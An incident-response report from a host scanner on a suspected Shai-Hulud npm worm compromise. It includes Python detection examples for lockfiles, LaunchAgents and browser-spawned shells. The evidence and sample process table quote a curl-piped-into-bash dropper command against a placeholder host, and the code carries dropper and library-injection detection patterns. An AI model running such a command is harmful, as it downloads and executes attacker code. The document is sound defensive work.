Executive summary [critical]

demo-laptop has converging evidence of active compromise. A lockfile in /Users/analyst/code/frontend pins chalk@5.6.1, a known-bad version from the Shai-Hulud npm worm campaign, and the worm's signature workflow file (shai-hulud-workflow.yml) is present alongside it. A bash process spawned by Chrome is curl-piping a remote script into a shell. Outbound traffic from that shell terminates at 185.220.101.46, an IP currently listed in abuse.ch ThreatFox. LD_PRELOAD is set to a hidden library under /tmp; on a Linux host that would inject an attacker-controlled library into every newly launched process, and although this appears to be a macOS host (LaunchAgents, /Users) whose dyld ignores LD_PRELOAD in favour of DYLD_INSERT_LIBRARIES, nothing legitimate sets it on a user desktop, so its presence still points at attacker activity. A LaunchAgent references a binary under /Users/Shared/.cache/. Either the host has been compromised, or this is an extremely well-staged false positive.

Top actions

If compromised: Treat as a confirmed worm-driven supply-chain compromise. Assume credential theft has occurred. Rotate every secret in scope before reconnecting to the network.

Attribution hint: Shai-Hulud npm worm (community-attributed; multi-actor)

artifacts: 7
findings: 7
critical: 3
high: 3
medium: 0
low: 0
info: 1
[critical] Live ThreatFox IP match: 185.220.101.46 (c2)
MITRE T1071

Established connection to 185.220.101.46:443 matches a live ThreatFox indicator. Treat it as command-and-control infrastructure until shown otherwise, but confirm before escalating on the IP alone: check the ThreatFox entry's confidence, malware tag and first/last-seen dates, and tie the socket to its owning process (PID 2204, the browser-spawned bash; see the network_anomaly finding) so the intel hit is corroborated by host evidence.

Evidence

{
  "ip": "185.220.101.46",
  "raddr": [
    "185.220.101.46",
    443
  ]
}
[critical] Shai-Hulud compromised package: chalk@5.6.1 (shai_hulud)
MITRE T1195.002

Project /Users/analyst/code/frontend has compromised npm package chalk@5.6.1 in its lockfile. This package version is listed as part of the Shai-Hulud npm worm campaign. Treat the host as potentially compromised: rotate tokens, audit recent `npm publish` activity, and inspect for the worm workflow file.

AI triage

confirmed_malicious (confidence , reassessed severity critical)

chalk@5.6.1 lockfile entry matches the Shai-Hulud worm; rotate tokens immediately

Observed: package-lock.json pins chalk@5.6.1, a version on the compromised-package lists published for the September 2025 npm campaigns (multiple corroborating sources: Aikido, StepSecurity, Socket.dev). Inferred: any `npm install` that ran in this project without `--ignore-scripts` may have executed the worm's post-install script, which harvests credentials from the environment and filesystem, exfiltrates them to a webhook.site endpoint, drops the shai-hulud-workflow.yml GitHub Actions file, and self-propagates by publishing trojaned versions of every package the stolen npm token can write to. Caveat: chalk@5.6.1 is also the version pushed in the 8 September 2025 compromise of the chalk/debug maintainer account, whose payload was a browser crypto-clipper rather than a self-propagating worm; check which campaign's list produced this match, since the worm response adds the npm-publish audit and workflow-file hunt below.

Next steps

  • Immediately revoke the user's NPM_TOKEN, any GitHub PATs accessible from this shell session, and any cloud-provider credentials present in the environment or in per-user config files.
  • Audit recent `npm publish` activity on the user's account at https://www.npmjs.com/settings/<user>/packages.
  • Inspect for the worm-installed `.github/workflows/shai-hulud-workflow.yml` — see the next finding.
  • Delete node_modules, remove the compromised version from package-lock.json, re-run `npm install --ignore-scripts`.
  • Run `trufflehog` against the affected repo to find any leaked credentials.

Attribution hint: Shai-Hulud npm worm campaign (multi-actor, first wave Sep 2025)

Evidence

{
  "package": "chalk@5.6.1",
  "project": "/Users/analyst/code/frontend"
}
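The lockfile check this finding describes, as an added example (not the scanner's own code): it walks every installed package in a package-lock.json, including nested copies under a dependency's own node_modules, matches name@version against an IOC table, and also lists packages that npm recorded as having install scripts, since those are what a post-install payload rides on. The IOC table and both sample lockfiles are constructed for illustration; only chalk@5.6.1 comes from the finding, and "example-worm-pkg" is a hypothetical placeholder.

```python
"""Scan an npm package-lock.json for known-compromised package versions.

Added example for this report; it is not the scanner's own code. The IOC
table and both lockfiles below are constructed samples: only chalk@5.6.1
comes from the finding, the rest is filler for illustration.
"""
import json
import sys
from typing import Dict, Iterator, List, Set, Tuple

# name -> compromised versions. Populate from the campaign advisories the
# finding cites (Aikido, StepSecurity, Socket.dev); "example-worm-pkg" is a
# hypothetical placeholder, not a real IOC.
COMPROMISED: Dict[str, Set[str]] = {
    "chalk": {"5.6.1"},
    "example-worm-pkg": {"1.2.3"},
}

# lockfileVersion 3 layout: "packages" keyed by path inside node_modules.
SAMPLE_LOCKFILE_V3 = json.dumps({
    "name": "frontend",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "frontend", "dependencies": {"chalk": "^5.6.0"}},
        "node_modules/chalk": {"version": "5.6.1"},
        "node_modules/left-pad": {"version": "1.3.0"},
        # nested copy of a different, clean version: must not be reported
        "node_modules/some-tool/node_modules/chalk": {"version": "4.1.2"},
        # npm records install hooks here; worth listing even when not an IOC
        "node_modules/native-thing": {"version": "2.0.0", "hasInstallScript": True},
    },
})

# lockfileVersion 1 layout: nested "dependencies" tree.
SAMPLE_LOCKFILE_V1 = json.dumps({
    "name": "frontend",
    "lockfileVersion": 1,
    "dependencies": {
        "some-tool": {
            "version": "3.0.0",
            "dependencies": {"chalk": {"version": "5.6.1"}},
        },
    },
})


def lock_entries(lock: dict) -> Iterator[Tuple[str, str, dict]]:
    """Yield (name, version, entry) for every installed package.

    Handles lockfileVersion 2/3 ("packages" map) and v1 ("dependencies" tree);
    v2 carries both, and "packages" is the authoritative one there.
    """
    if "packages" in lock:
        for path, entry in lock["packages"].items():
            if path == "":  # the root project itself
                continue
            # Aliased installs carry an explicit "name"; otherwise the name is
            # whatever follows the last "node_modules/" (scoped names keep "@scope/").
            name = entry.get("name") or path.rsplit("node_modules/", 1)[-1]
            yield name, entry.get("version", ""), entry
        return

    def walk(deps: dict) -> Iterator[Tuple[str, str, dict]]:
        for name, entry in deps.items():
            yield name, entry.get("version", ""), entry
            yield from walk(entry.get("dependencies", {}))

    yield from walk(lock.get("dependencies", {}))


def scan_lockfile(text: str, iocs: Dict[str, Set[str]] = COMPROMISED) -> Dict[str, List[str]]:
    """Return compromised name@version matches and packages with install scripts."""
    lock = json.loads(text)
    compromised, install_scripts = set(), set()
    for name, version, entry in lock_entries(lock):
        if version in iocs.get(name, ()):
            compromised.add(f"{name}@{version}")
        if entry.get("hasInstallScript"):
            install_scripts.add(f"{name}@{version}")
    return {"compromised": sorted(compromised), "install_scripts": sorted(install_scripts)}


if __name__ == "__main__":
    # Usage: python scan_lock.py /Users/analyst/code/frontend/package-lock.json
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else SAMPLE_LOCKFILE_V3
    print(json.dumps(scan_lockfile(text), indent=2))
```

Run it against the real lockfile before and after the clean-up step (`npm install --ignore-scripts`); the "install_scripts" list is the set of packages whose hooks would have run on the original install, which is the scope for the credential rotation above.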
[critical] Shai-Hulud worm workflow artifact: /Users/analyst/code/frontend/.github/workflows/shai-hulud-workflow.yml (shai_hulud)
MITRE T1199

GitHub Actions workflow file matches the worm's filename signature and references the canonical webhook.site exfil endpoint. This is the self-propagation vehicle of the Shai-Hulud worm.

Evidence

{
  "bad_name": true,
  "markers": [
    "shai-hulud",
    "webhook.site"
  ],
  "path": "/Users/analyst/code/frontend/.github/workflows/shai-hulud-workflow.yml"
}
[high] LD_PRELOAD set in environment (env_hijack)
MITRE T1574.006

LD_PRELOAD is set to '/tmp/.X11-unix/.libtelemetry.so'. On Linux this forces the glibc dynamic linker to load the named library into every dynamically linked process started from this environment. On macOS, which this host appears to be (LaunchAgents, /Users), dyld ignores LD_PRELOAD and honours DYLD_INSERT_LIBRARIES instead, so check the environment for the DYLD_* variables as well. Either way, a hidden shared object under /tmp/.X11-unix is almost never legitimate on a user desktop: find where the variable is set (shell rc files, `launchctl getenv LD_PRELOAD`, LaunchAgent EnvironmentVariables blocks) and preserve the library for analysis before anything deletes /tmp.

Evidence

{
  "value": "/tmp/.X11-unix/.libtelemetry.so",
  "var": "LD_PRELOAD"
}
[high] Persistence entry references /Users/Shared/.cache/ (persistence_outlier)
MITRE T1543.001

LaunchAgent com.example.helper runs /Users/Shared/.cache/helper in the user's login session (a LaunchAgent rather than a system daemon, but it starts automatically at login). Persistence entries should not reference world-writable shared scratch space, and a hidden .cache directory under /Users/Shared is a further outlier.

Evidence

{
  "match": "/Users/Shared/",
  "subject": "launchd:/Users/analyst/Library/LaunchAgents/com.example.helper.plist"
}
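The checks behind the env_hijack and persistence_outlier findings above, as one added example (not the scanner's own code): it parses a LaunchAgent plist with the standard-library plistlib, flags executables under shared or scratch paths and hidden directories, flags library-injection variables in the plist's EnvironmentVariables block and in a live process environment, and notes when RunAtLoad plus KeepAlive will make launchd respawn the job. The sample plist is constructed to mirror com.example.helper and the LD_PRELOAD value from the findings; its EnvironmentVariables block is an assumption about one common way a LaunchAgent seeds LD_PRELOAD or DYLD_* into everything it spawns, not recovered evidence.

```python
"""Audit a macOS LaunchAgent plist and a process environment for
persistence outliers and library-injection variables.

Added example; not the scanner's own code. SAMPLE_PLIST is constructed to
mirror com.example.helper and the LD_PRELOAD value from the findings; the
EnvironmentVariables block is an assumption for illustration.
"""
import os
import plistlib
from typing import Dict, List

# World-writable or scratch locations no persistence entry should execute from.
SUSPICIOUS_PREFIXES = ("/Users/Shared/", "/tmp/", "/private/tmp/",
                       "/var/tmp/", "/private/var/tmp/", "/var/folders/")
# Library-injection variables. LD_PRELOAD is honoured by the glibc loader on
# Linux; macOS dyld ignores it and uses the DYLD_* variables instead, so both
# families are checked.
INJECT_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "DYLD_INSERT_LIBRARIES",
               "DYLD_LIBRARY_PATH", "DYLD_FRAMEWORK_PATH")

SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key>
  <array><string>/Users/Shared/.cache/helper</string><string>--quiet</string></array>
  <key>EnvironmentVariables</key>
  <dict><key>LD_PRELOAD</key><string>/tmp/.X11-unix/.libtelemetry.so</string></dict>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""


def hidden_component(path: str) -> bool:
    """True if any directory or file name in the path starts with a dot."""
    return any(part.startswith(".") for part in path.split("/") if part)


def audit_environ(env: Dict[str, str]) -> List[str]:
    """Flag library-injection variables present in an environment mapping."""
    return [f"{var} is set: {env[var]}" for var in INJECT_VARS if var in env]


def audit_launch_agent(data: bytes) -> List[str]:
    """Return a list of findings for one LaunchAgent/LaunchDaemon plist."""
    plist = plistlib.loads(data)
    issues: List[str] = []
    args = plist.get("ProgramArguments") or []
    # The executable is "Program" or argv[0]; de-duplicate if both appear.
    executables = list(dict.fromkeys(p for p in [plist.get("Program"), *args[:1]] if p))
    for exe in executables:
        if exe.startswith(SUSPICIOUS_PREFIXES):
            issues.append(f"executable in shared or scratch space: {exe}")
        if hidden_component(exe):
            issues.append(f"executable under a hidden directory: {exe}")
    # Variables set here are inherited by the job and everything it spawns.
    issues += audit_environ(plist.get("EnvironmentVariables") or {})
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        issues.append("RunAtLoad with KeepAlive: launchd restarts it if killed")
    return issues


if __name__ == "__main__":
    import glob
    for path in glob.glob(os.path.expanduser("~/Library/LaunchAgents/*.plist")):
        with open(path, "rb") as fh:
            for issue in audit_launch_agent(fh.read()):
                print(f"{path}: {issue}")
    for issue in audit_environ(dict(os.environ)):
        print(f"environment: {issue}")
```

Because the audit works on the plist bytes rather than on launchctl output, it can be run over a forensic copy of ~/Library/LaunchAgents and /Library/LaunchAgents without loading anything on the suspect host.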
[high] Shell (bash) spawned by browser (Google Chrome) (suspicious_processes)
MITRE T1059

PID 2204 (bash) was spawned by browser process Google Chrome. Browsers should not parent shells; this is characteristic of post-exploitation via a malicious extension or compromised renderer.

AI triage

likely_malicious (confidence , reassessed severity high)

Chrome→bash with curl|bash pattern strongly suggests post-exploitation through a renderer or extension

Observed: bash process with parent PID 1487 (Google Chrome) and a command line that pipes a remote-downloaded shell script directly into bash. Browsers do not legitimately spawn interactive shells; the curl|bash pattern is a textbook dropper. Inferred: post-exploitation via a malicious extension or a compromised renderer tab. Source reliability is high (deterministic OS API); information credibility is moderate pending corroboration with browser-extension audit.

Next steps

  • Preserve volatile state: `lsof -p 2204`, `launchctl procinfo 2204` (or `ps -o pid,ppid,lstart,command -p 2204`), and `kill -STOP 2204` (suspend; do not kill yet, or the socket and the child processes are lost).
  • Audit installed Chrome extensions: chrome://extensions/ (developer mode shows extension IDs), the on-disk copies under ~/Library/Application Support/Google/Chrome/<Profile>/Extensions/, and `chrome --enable-logging --vmodule=*extension*=2` for verbose extension logging.
  • Pull the install.sh from the captured URL in a sandbox and inspect.
  • Run `digger loki scan` to cross-check against signature-base IOCs.
  • Rotate any tokens that were in env vars on this shell (see env_hijack finding).

Evidence

{
  "cmdline": "/bin/bash -c 'curl -fsSL https://wbn.example.io/install.sh | bash'",
  "pid": 2204,
  "ppid": 1487
}
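The detection logic behind this finding, as an added example (not the scanner's own code): given a process snapshot in the shape of the evidence above (pid, ppid, cmdline, plus a process name), it walks each shell's ancestry looking for a browser, and independently flags curl-or-wget-piped-into-a-shell command lines and extracts the fetched URL for sandbox retrieval. PROCESS_TABLE is a constructed snapshot; PIDs 1487/2204 and the bash command line come from the finding, the other rows (including the abbreviated renderer command line) are filler.

```python
"""Detect shells whose ancestry runs through a browser, and curl|sh droppers,
in a process snapshot.

Added example; not the scanner's own code. PROCESS_TABLE is a constructed
snapshot: PIDs 1487/2204 and their command line come from the finding, the
remaining rows are filler.
"""
import re
from typing import Dict, Iterator, List, Optional

PROCESS_TABLE: List[Dict] = [
    {"pid": 1, "ppid": 0, "name": "launchd", "cmdline": "/sbin/launchd"},
    {"pid": 412, "ppid": 1, "name": "loginwindow", "cmdline": "loginwindow console"},
    {"pid": 1487, "ppid": 412, "name": "Google Chrome",
     "cmdline": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"},
    {"pid": 1490, "ppid": 1487, "name": "Google Chrome Helper (Renderer)",
     "cmdline": "Google Chrome Helper (Renderer) --type=renderer"},  # abbreviated
    {"pid": 2204, "ppid": 1487, "name": "bash",
     "cmdline": "/bin/bash -c 'curl -fsSL https://wbn.example.io/install.sh | bash'"},
    {"pid": 2210, "ppid": 2204, "name": "curl", "cmdline": "curl -fsSL https://wbn.example.io/install.sh"},
    {"pid": 2211, "ppid": 2204, "name": "bash", "cmdline": "bash"},
    {"pid": 930, "ppid": 412, "name": "Terminal",
     "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 935, "ppid": 930, "name": "zsh", "cmdline": "-zsh"},
]

BROWSER_PREFIXES = ("Google Chrome", "Chromium", "Safari", "firefox", "Firefox",
                    "Microsoft Edge", "Brave Browser")
SHELLS = {"sh", "bash", "zsh", "dash", "ksh", "fish"}
# "<curl|wget ...> | [sudo] <sh|bash|zsh|dash|ksh>" anywhere in a command line.
DROPPER_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da|k)?sh\b")
URL_RE = re.compile(r"https?://[^\s'\"|;&]+")


def by_pid(procs: List[Dict]) -> Dict[int, Dict]:
    return {p["pid"]: p for p in procs}


def ancestors(table: Dict[int, Dict], pid: int, limit: int = 64) -> Iterator[Dict]:
    """Yield ancestor records from the parent upward.

    Stops at a parent missing from the snapshot (e.g. launchd's ppid 0); the
    seen-set and limit guard against cycles in an inconsistent snapshot.
    """
    seen = set()
    proc = table.get(pid)
    while proc and proc["ppid"] in table and proc["ppid"] not in seen and len(seen) < limit:
        seen.add(proc["ppid"])
        proc = table[proc["ppid"]]
        yield proc


def browser_ancestor(table: Dict[int, Dict], pid: int) -> Optional[str]:
    """Name of the nearest browser process in the ancestry, or None."""
    for anc in ancestors(table, pid):
        if anc["name"].startswith(BROWSER_PREFIXES):
            return anc["name"]
    return None


def is_dropper(cmdline: str) -> bool:
    return DROPPER_RE.search(cmdline) is not None


def fetched_url(cmdline: str) -> Optional[str]:
    m = URL_RE.search(cmdline)
    return m.group(0) if m else None


def find_browser_spawned_shells(procs: List[Dict]) -> List[Dict]:
    """Return one finding per shell that has a browser anywhere in its ancestry."""
    table = by_pid(procs)
    findings = []
    for p in procs:
        if p["name"] not in SHELLS:
            continue
        browser = browser_ancestor(table, p["pid"])
        if browser is None:
            continue
        dropper = is_dropper(p["cmdline"])
        findings.append({
            "pid": p["pid"], "ppid": p["ppid"], "browser_ancestor": browser,
            "dropper": dropper,
            # URL is only meaningful for a dropper; it is what goes to the sandbox.
            "url": fetched_url(p["cmdline"]) if dropper else None,
        })
    return findings


if __name__ == "__main__":
    for f in find_browser_spawned_shells(PROCESS_TABLE):
        print(f)
```

The ancestry walk rather than a direct parent check is deliberate: the grandchild bash (PID 2211 in the sample) is the shell that actually executes the fetched script, and a direct-parent rule would miss it. Records in this shape can be produced from osquery's processes table (pid, parent, name, cmdline) or an EDR export; plain `ps` output is awkward here because macOS process names such as "Google Chrome" contain spaces.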
[info] External connection to 185.220.101.46:443 (network_anomaly)
MITRE T1071

Established connection to public address 185.220.101.46:443 from PID 2204 (bash).

Evidence

{
  "pid": 2204,
  "raddr": [
    "185.220.101.46",
    443
  ]
}